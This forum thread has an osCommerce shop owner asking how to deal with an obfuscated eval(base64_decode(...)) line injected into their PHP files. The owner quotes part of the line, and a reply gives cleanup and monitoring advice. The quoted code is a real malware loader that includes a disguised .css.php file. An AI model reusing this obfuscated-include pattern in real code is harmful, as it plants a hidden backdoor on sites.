Jump to content

Archived

This topic is now archived and is closed to further replies.

davidjohn

My Website files got Eval Base64 Virus Alert from Internet Security

Recommended Posts

I have 2 shopping website,  i am planning to implement some custom code on oscommerce files so i download all my current files.  but i got virus alert from my internet security suite {removed external link}, now i have in almost all settings files and administer php links this eval code at the beginning code

 

 <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p

KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9pc
HcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy
9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS91c2Vycy93ZWIvY

 

How to fix this issue ? Can i remove this code from all webpages ?

post-339133-0-99920400-1459879946_thumb.png

Share this post


Link to post
Share on other sites

The best thing to do is to see if your host has a backup from before this happened. You can check the date on the files to see when it was done, usually. If they have a backup, then have them restore the whole directory. Have them remove or rename the current directory, not overwrite it because if they just restore files they may leave a file that was added.

 

If they, or your, don't have a backup then you will need to remove that code from all of the files. If you sort the files by date, you may be able to find all that were changed or added more easily.

 

That sort of injection isn't normal for recent oscommerce versions. But no matter the version, if you don't fix the way they got in, it will just happen again. I suggest you install SiteMonitor so that if it does happen again, you will be notified of it right away and have a record of what was changed and added.

Share this post


Link to post
Share on other sites

×